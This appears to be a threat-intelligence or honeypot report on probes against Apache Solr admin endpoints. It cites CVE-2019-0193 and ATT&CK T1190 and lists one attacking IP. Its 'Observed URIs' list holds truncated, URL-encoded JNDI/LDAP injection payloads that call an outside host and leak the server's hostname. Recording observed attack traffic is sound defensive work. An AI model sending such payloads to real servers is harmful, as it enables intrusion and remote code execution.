Apache Solr Admin API Probe for 2026-03-04

Mar 04, 2026 WebExploit

Last Updated: 12:10 UTC

Direct probing of /solr/admin/ management endpoints. CVE-2019-0193 (DataImportHandler RCE) requires admin API access and is frequently exploited for cryptominer deployment. The info/system and cores endpoints are the standard first requests in a Solr exploitation chain.

CVE References

CVE-2019-0193

MITRE ATT&CK

Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application

Observed URIs

/solr/admin/cores?wt=json
/solr/admin/info/properties:/admin/info/key
/solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-534%7D%24%7B%3A-865%7D.%24%7BhostName%7D.uri.d6jrke6fen1...
/solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-534%7D%24%7B%3A-865%7D.%24%7BhostName%7D.uri.d6jrk...
/solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-534%7D%24%7B%3A-865%7D.%24%7BhostName%7D.uri.d6jrk...

Attackers by Country

IP Address : ASN : City/Provider

198.167.197.194 : AS39287 ab stract : Sweden

Share on: